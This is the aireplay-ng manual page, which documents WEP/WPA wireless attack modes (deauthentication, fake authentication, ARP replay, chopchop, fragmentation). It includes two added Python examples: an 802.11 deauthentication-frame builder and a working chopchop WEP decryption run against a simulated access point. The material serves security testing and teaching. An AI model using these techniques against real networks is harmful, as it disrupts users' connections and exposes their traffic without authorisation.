AIREPLAY-NG(8)              System Manager's Manual             AIREPLAY-NG(8)

NAME

       aireplay-ng - inject packets into a wireless network to generate traffic

SYNOPSIS

       aireplay-ng [options] <replay interface>

DESCRIPTION

       aireplay-ng is used to inject/replay frames. The primary function is to
       generate traffic for later use in aircrack-ng for cracking WEP and
       WPA-PSK keys. There are different attacks which can cause
       deauthentications for the purpose of capturing WPA handshake data, fake
       authentications, interactive packet replay, hand-crafted ARP request
       injection and ARP-request reinjection. With the packetforge-ng tool it
       is possible to create arbitrary frames.

       aireplay-ng supports single-NIC injection/monitor.

       This feature needs driver patching.


OPTIONS

       -H, --help
              Shows the help screen.

       Filter options:

       -b <bssid>
              MAC address of access point.

       -d <dmac>
              MAC address of destination.

       -s <smac>
              MAC address of source.

       -m <len>
              Minimum packet length.

       -n <len>
              Maximum packet length.

       -u <type>
              Frame control, type field.

       -v <subt>
              Frame control, subtype field.

       -t <tods>
              Frame control, "To" DS bit (0 or 1).

       -f <fromds>
              Frame control, "From" DS bit (0 or 1).

       -w <iswep>
              Frame control, WEP bit (0 or 1).

       -D     Disable AP Detection.

       Replay options:

       -x <nbpps>
              Number of packets per second.

       -p <fctrl>
              Set frame control word (hex).

       -a <bssid>
              Set Access Point MAC address.

       -c <dmac>
              Set destination MAC address.

       -h <smac>
              Set source MAC address.

       -g <nb_packets>
              Change ring buffer size (default: 8 packets). The minimum is 1.

       -F     Choose first matching packet.

       -e <essid>
              Fake Authentication attack: Set target SSID (see below). For an
              SSID containing special characters, see
              https://www.aircrack-ng.org/doku.php?id=faq#how_to_use_spaces_double_quote_and_single_quote_etc_in_ap_names

       -o <npackets>
              Fake Authentication attack: Set the number of packets for every
              authentication and association attempt (Default: 1). 0 means
              auto.

       -q <seconds>
              Fake Authentication attack: Set the time between keep-alive
              packets in fake authentication mode.

       -Q     Fake Authentication attack: Sends reassociation requests instead
              of performing a complete authentication and association after
              each delay period.

       -y <prga>
              Fake Authentication attack: Specifies the keystream file for
              fake shared key authentication.

       -T n   Fake Authentication attack: Exit if fake authentication fails
              'n' time(s).

       -j     ARP Replay attack: inject FromDS packets (see below).

       -k <IP>
              Fragmentation attack: Set destination IP in fragments.

       -l <IP>
              Fragmentation attack: Set source IP in fragments.

       -B     Test option: bitrate test.

       Source options:

       -i <iface>
              Capture packets from this interface.

       -r <file>
              Extract packets from this pcap file.

       Miscellaneous options:

       -R     Disable /dev/rtc usage.

       --ignore-negative-one
              If the interface's channel can't be determined, ignore the
              mismatch. Needed for unpatched cfg80211.

       --deauth-rc <rc>, -Z <rc>
              Provide a reason code when doing deauthentication (between 0 and
              255). By default, 7 is used: Class 3 frame received from
              unassociated STA. 0 is a reserved value. Reason code explanations
              can be found in the IEEE 802.11 standard or in
              https://mrncciew.com/2014/10/11/802-11-mgmt-deauth-disassociation-frames/
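       The filter and replay options above are all fields of the 802.11 MAC
       header. The following example, added here and not part of aircrack-ng,
       encodes and decodes the frame control word, maps addr1..addr3 onto
       BSSID/source/destination according to the To-DS/From-DS bits so that
       -b/-d/-s style filters can be evaluated, pulls the IV out of WEP data
       frames (the value the replay attacks exist to multiply), and builds the
       deauthentication frame that -0 sends with the --deauth-rc reason code.
       It assumes that the -p word is written in wire byte order (0841 meaning
       bytes 08 41); the MAC addresses and the three sample frames are
       constructed placeholders, and the FCS is left to the driver.

```python
"""802.11 header fields behind aireplay-ng's filter (-b -d -s -m -n -u -v -t -f -w)
and replay (-p -a -c -h) options, plus the deauthentication frame -0 sends.
Example code added for this page, not aircrack-ng's own. Frames are built
inline without the trailing FCS; the MAC addresses are placeholders.
"""
import struct

TYPE_MGMT, TYPE_CTRL, TYPE_DATA = 0, 1, 2
SUBTYPE_BEACON, SUBTYPE_DEAUTH = 8, 12
FLAG_TO_DS, FLAG_FROM_DS, FLAG_PROTECTED = 0x01, 0x02, 0x40   # flags byte bits 0, 1 and 6
BCAST = "ff:ff:ff:ff:ff:ff"
AP, STA = "00:11:22:33:44:55", "66:77:88:99:aa:bb"            # constructed placeholder addresses


def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def fc_encode(ftype: int, subtype: int, tods=0, fromds=0, wep=0) -> bytes:
    """Frame control in wire order: byte 0 = subtype<<4 | type<<2 | version 0,
    byte 1 = flags (To-DS, From-DS, ..., Protected/WEP)."""
    b0 = (subtype << 4) | (ftype << 2)
    b1 = (FLAG_TO_DS if tods else 0) | (FLAG_FROM_DS if fromds else 0) | (FLAG_PROTECTED if wep else 0)
    return bytes([b0, b1])


def fc_decode(fc: bytes) -> dict:
    """Split the 2-byte frame control into the fields -u, -v, -t, -f and -w filter on."""
    b0, b1 = fc[0], fc[1]
    return {"type": (b0 >> 2) & 3, "subtype": b0 >> 4,
            "tods": b1 & 1, "fromds": (b1 >> 1) & 1, "wep": (b1 >> 6) & 1}


def fc_from_word(word: str) -> bytes:
    """Frame control as 4 hex digits in wire byte order, the way this example
    assumes -p takes it: '0841' means bytes 08 41 (data frame, To-DS, WEP)."""
    return bytes.fromhex(word)


def parse(frame: bytes) -> dict:
    """Decode the MAC header and map addr1..addr3 onto BSSID, source and
    destination according to the To-DS/From-DS bits (IEEE 802.11 address table)."""
    fc = fc_decode(frame[0:2])
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if not fc["tods"] and not fc["fromds"]:
        da, sa, bssid = a1, a2, a3
    elif fc["tods"] and not fc["fromds"]:
        bssid, sa, da = a1, a2, a3
    elif not fc["tods"] and fc["fromds"]:
        da, bssid, sa = a1, a2, a3
    else:                                   # WDS frame: addr4 follows the sequence control
        da, sa, bssid = a3, frame[24:30], b""
    body = frame[30:] if (fc["tods"] and fc["fromds"]) else frame[24:]
    info = dict(fc, len=len(frame), bssid=mac_str(bssid), smac=mac_str(sa),
                dmac=mac_str(da), body=body)
    if fc["type"] == TYPE_DATA and fc["wep"] and len(body) >= 4:
        info["iv"] = body[:3].hex()         # the 24-bit IV that the WEP attacks collect
        info["keyidx"] = body[3] >> 6
    return info


def matches(info: dict, **flt) -> bool:
    """aireplay-ng style filter. Keys: bssid, dmac, smac, minlen (-m), maxlen (-n),
    type (-u), subtype (-v), tods (-t), fromds (-f), wep (-w). Unset keys match all."""
    for key, want in flt.items():
        if key == "minlen":
            if info["len"] < want:
                return False
        elif key == "maxlen":
            if info["len"] > want:
                return False
        elif info.get(key) != want:
            return False
    return True


def select(frames, **flt):
    """Parsed frames a given filter would let through."""
    return [info for info in map(parse, frames) if matches(info, **flt)]


def build_deauth(dst: str, src: str, bssid: str, reason=7, seq=0) -> bytes:
    """Deauthentication: management header followed by the 2-byte reason code
    (7 = class 3 frame received from unassociated STA, the --deauth-rc default)."""
    hdr = fc_encode(TYPE_MGMT, SUBTYPE_DEAUTH) + struct.pack("<H", 0x013A)   # duration/ID
    hdr += mac(dst) + mac(src) + mac(bssid) + struct.pack("<H", seq << 4)   # seq ctrl, fragment 0
    return hdr + struct.pack("<H", reason)


def deauth_pair(ap: str, client: str, reason=7):
    """Both directions of one -0 round: spoofed AP -> client and spoofed client -> AP."""
    return build_deauth(client, ap, ap, reason), build_deauth(ap, client, ap, reason)


def sample_frames():
    """Constructed capture: a WEP data frame STA -> AP (frame control 0841), a
    beacon from the AP, and the AP -> client deauth built above."""
    wep_data = (fc_from_word("0841") + struct.pack("<H", 0) + mac(AP) + mac(STA) + mac(BCAST)
                + struct.pack("<H", 0) + bytes.fromhex("a1b2c3") + b"\x00" + b"\x00" * 36)
    beacon = (fc_encode(TYPE_MGMT, SUBTYPE_BEACON) + struct.pack("<H", 0) + mac(BCAST)
              + mac(AP) + mac(AP) + struct.pack("<H", 0) + b"\x00" * 12)
    return [wep_data, beacon, deauth_pair(AP, STA)[0]]
```

       select(sample_frames(), bssid=AP, type=TYPE_DATA, wep=1, tods=1) is the
       Python equivalent of -b <AP> -u 2 -w 1 -t 1 and returns only the WEP
       data frame with its IV; note that the BSSID sits in addr1 for that
       frame but in addr3 for the beacon and the deauth, which is why a
       filter has to look at the DS bits before comparing addresses.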

       Attack modes:

       -0 <count>, --deauth=<count>
              This attack sends deauthentication packets to one or more
              clients which are currently associated with a particular access
              point. Deauthenticating clients can be done for a number of
              reasons:
              - Recovering a hidden ESSID, i.e. an ESSID which is not being
              broadcast (also called "cloaked").
              - Capturing WPA/WPA2 handshakes by forcing clients to
              reauthenticate.
              - Generating ARP requests (Windows clients sometimes flush their
              ARP cache when disconnected).
              Of course, this attack is totally useless if there is no
              associated wireless client, or against fake authentications.

       -1 <delay>, --fakeauth=<delay>
              The fake authentication attack allows you to perform the two
              types of WEP authentication (Open System and Shared Key) plus
              associate with the access point (AP). This is only useful when
              you need an associated MAC address in various aireplay-ng
              attacks and there is currently no associated client. It should
              be noted that the fake authentication attack does NOT generate
              any ARP packets. Fake authentication cannot be used to
              authenticate/associate with WPA/WPA2 Access Points.

       -2, --interactive
              This attack allows you to choose a specific packet for replaying
              (injecting). The attack can obtain packets to replay from two
              sources. The first is a live flow of packets from your wireless
              card. The second is a pcap file. Reading from a file is an often
              overlooked feature of aireplay-ng. It allows you to read packets
              from other capture sessions, and quite often various attacks
              generate pcap files for easy reuse. A common use is reading a
              file containing a packet you created with packetforge-ng.

       -3, --arpreplay
              The classic ARP request replay attack is the most effective way
              to generate new initialization vectors (IVs), and works very
              reliably. The program listens for an ARP packet then retransmits
              it back to the access point. This, in turn, causes the access
              point to repeat the ARP packet with a new IV. The program
              retransmits the same ARP packet over and over. However, each ARP
              packet repeated by the access point has a new IV. It is all
              these new IVs which allow you to determine the WEP key.

       -4, --chopchop
              This attack, when successful, can decrypt a WEP data packet
              without knowing the key. It can even work against dynamic WEP.
              This attack does not recover the WEP key itself, but merely
              reveals the plaintext. However, some access points are not
              vulnerable to this attack. Some may seem vulnerable at first but
              actually drop data packets shorter than 60 bytes. If the access
              point drops packets shorter than 42 bytes, aireplay tries to
              guess the rest of the missing data, as far as the headers are
              predictable. If an IP packet is captured, it additionally checks
              if the checksum of the header is correct after guessing the
              missing parts of it. This attack requires at least one WEP data
              packet.
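              Chopchop works because the WEP ICV is a CRC-32, which is linear:
              after the last ciphertext byte is chopped off, a guess at its
              plaintext value determines a 4-byte correction that makes the
              shortened packet's ICV valid again, and the access point tells
              the attacker whether the guess was right by accepting or
              dropping the frame. The following example, added here and not
              part of aircrack-ng, carries that through against a local
              stand-in for the access point (it also illustrates why the
              FRAGMENTATION VERSUS CHOPCHOP section below says chopchop is
              slow: up to 256 frames per recovered byte). The packet, key
              stream and oracle are all constructed; the stand-in accepts any
              frame of at least 4 bytes, so the minimum-length behaviour of
              real APs that forces aireplay-ng to guess header bytes is not
              modelled, and RC4 is replaced by a seeded random key stream
              because the attack never touches the cipher, only the ICV.

```python
"""Chopchop (KoreK) against a WEP-protected payload, with the access point
replaced by a local accept/drop oracle. Added example, not aircrack-ng code;
packet, key stream and AP are constructed here.
"""
import random
import zlib

POLY = 0xEDB88320                     # CRC-32 (reflected), as used for the WEP ICV
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)
INV = {t >> 24: i for i, t in enumerate(TABLE)}   # top byte -> index, a bijection for CRC-32
assert len(INV) == 256
MAGIC = 0x2144DF1C                    # zlib.crc32(msg || icv_le(msg)) for any msg


def step(reg: int, b: int) -> int:
    """Absorb one byte into the CRC register."""
    return (reg >> 8) ^ TABLE[(reg ^ b) & 0xFF]


def unstep(reg_after: int, b: int) -> int:
    """Invert step(): the register as it was before byte b was absorbed."""
    i = INV[reg_after >> 24]
    return (((reg_after ^ TABLE[i]) << 8) & 0xFFFFFFFF) | (i ^ b)


def crc_raw(data: bytes, reg: int = 0xFFFFFFFF) -> int:
    for b in data:
        reg = step(reg, b)
    return reg


RESIDUE = crc_raw(b"\x00" * 4)        # register left by any valid msg||icv (MAGIC ^ 0xFFFFFFFF)


def wep_icv(msg: bytes) -> bytes:
    return zlib.crc32(msg).to_bytes(4, "little")


def icv_valid(pt: bytes) -> bool:
    return len(pt) >= 4 and zlib.crc32(pt) == MAGIC


def chop_correction(last_byte: int) -> bytes:
    """4-byte XOR mask that re-validates the ICV after the last byte is chopped,
    assuming that byte's plaintext value is last_byte. The mask does not depend
    on the packet, so all 256 of them are tabulated once."""
    reg_before = unstep(RESIDUE, last_byte)   # register over P[:-1] if the guess is right
    v = reg_before ^ RESIDUE                  # change needed in the final register
    for _ in range(4):                        # XOR-ing a mask into the last 4 bytes shifts the
        v = unstep(v, 0)                      # register by "absorb 4 zero bytes"(mask); invert it
    return v.to_bytes(4, "little")


CORRECTIONS = [chop_correction(g) for g in range(256)]


class FakeAP:
    """Stand-in for the access point: knows the key stream and accepts only
    frames whose decrypted ICV checks out, like a real AP forwarding a frame."""
    def __init__(self, keystream: bytes):
        self.ks = keystream
        self.queries = 0

    def accepts(self, ct: bytes) -> bool:
        self.queries += 1
        return icv_valid(bytes(c ^ k for c, k in zip(ct, self.ks)))


def chopchop(ct: bytes, ap: FakeAP):
    """Recover the plaintext (msg || ICV) and key stream for ct, one byte at a
    time from the end, using only the AP's accept/drop answers."""
    n = len(ct)
    plain = bytearray(n)
    mask = bytearray(n)          # XOR we have applied so far to each surviving position
    cur = bytearray(ct)
    while len(cur) > 4:
        pos = len(cur) - 1
        for guess in range(256):
            d = CORRECTIONS[guess]
            trial = bytearray(cur[:-1])
            for k in range(4):
                trial[pos - 4 + k] ^= d[k]
            if ap.accepts(bytes(trial)):
                plain[pos] = guess ^ mask[pos]   # undo our own earlier corrections
                for k in range(4):
                    mask[pos - 4 + k] ^= d[k]
                cur = trial
                break
        else:
            raise RuntimeError("oracle rejected every guess")
    for pos in range(4):         # a valid 4-byte frame is the ICV of the empty message: 0
        plain[pos] = mask[pos]
    keystream = bytes(c ^ p for c, p in zip(ct, plain))
    return bytes(plain), keystream


def demo():
    """Constructed sample: LLC/SNAP header + short payload under a seeded
    random key stream standing in for RC4(IV || key)."""
    msg = bytes.fromhex("aaaa030000000806") + b"constructed ARP payload"
    plain = msg + wep_icv(msg)
    rng = random.Random(2020)
    ks = bytes(rng.randrange(256) for _ in range(len(plain)))
    ct = bytes(p ^ k for p, k in zip(plain, ks))
    ap = FakeAP(ks)
    recovered, keystream = chopchop(ct, ap)
    return recovered[:-4], keystream == ks, ap.queries
```

              The recovered key stream is exactly the PRGA that -4 writes out
              and that packetforge-ng consumes, which is why the plaintext of
              one packet is enough to forge new ones of the same length.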

       -5, --fragment
              This attack, when successful, can obtain 1500 bytes of PRGA
              (pseudo random generation algorithm). This attack does not
              recover the WEP key itself, but merely obtains the PRGA. The
              PRGA can then be used to generate packets with packetforge-ng
              which are in turn used for various injection attacks. It
              requires at least one data packet to be received from the access
              point in order to initiate the attack.

       -6, --caffe-latte
              In general, for an attack to work, the attacker has to be in
              range of an AP and a connected client (fake or real). The Caffe
              Latte attack allows one to gather enough packets to crack a WEP
              key without the need of an AP; it just needs a client to be in
              range.

       -7, --cfrag
              This attack turns IP or ARP packets from a client into ARP
              requests against the client. This attack works especially well
              against ad-hoc networks. It can also be used against softAP
              clients and normal AP clients.

       -8, --migmode
              This attack works against Cisco Aironet access points configured
              in WPA Migration Mode, which enables both WPA and WEP clients to
              associate to an access point using the same Service Set
              Identifier (SSID). The program listens for a WEP-encapsulated
              broadcast ARP packet, bitflips it to make it into an ARP coming
              from the attacker's MAC address and retransmits it to the access
              point. This, in turn, causes the access point to repeat the ARP
              packet with a new IV and also to forward the ARP reply to the
              attacker with a new IV. The program retransmits the same ARP
              packet over and over. However, each ARP packet repeated by the
              access point has a new IV, as does the ARP reply forwarded to
              the attacker by the access point. It is all these new IVs which
              allow you to determine the WEP key.

       -9, --test
              Tests injection and quality.


FRAGMENTATION VERSUS CHOPCHOP

       Fragmentation:

              Pros
              - Can obtain the full packet length of 1500 bytes XOR. This
              means you can subsequently create pretty well any size of
              packet.
              - May work where chopchop does not.
              - Is extremely fast. It yields the XOR stream extremely quickly
              when successful.

              Cons
              - Setup to execute the attack is more subject to the device
              drivers. For example, Atheros does not generate the correct
              packets unless the wireless card is set to the MAC address you
              are spoofing.
              - You need to be physically closer to the access point, since if
              any packets are lost then the attack fails.

       Chopchop:

              Pros
              - May work where frag does not work.

              Cons
              - Cannot be used against every access point.
              - The maximum XOR bits is limited to the length of the packet
              you chopchop against.
              - Much slower than the fragmentation attack.


AUTHOR

       This manual page was written by Adam Cecile <gandalf@le-vert.net> for
       the Debian system (but may be used by others). Permission is granted
       to copy, distribute and/or modify this document under the terms of the
       GNU General Public License, Version 2 or any later version published by
       the Free Software Foundation. On Debian systems, the complete text of
       the GNU General Public License can be found in
       /usr/share/common-licenses/GPL.


SEE ALSO

       airbase-ng(8)
       airmon-ng(8)
       airodump-ng(8)
       airodump-ng-oui-update(8)
       airserv-ng(8)
       airtun-ng(8)
       besside-ng(8)
       easside-ng(8)
       tkiptun-ng(8)
       wesside-ng(8)
       aircrack-ng(1)
       airdecap-ng(1)
       airdecloak-ng(1)
       airolib-ng(1)
       besside-ng-crawler(1)
       buddy-ng(1)
       ivstools(1)
       kstats(1)
       makeivs-ng(1)
       packetforge-ng(1)
       wpaclean(1)
       airventriloquist(8)

Version 1.6.0                    January 2020                   AIREPLAY-NG(8)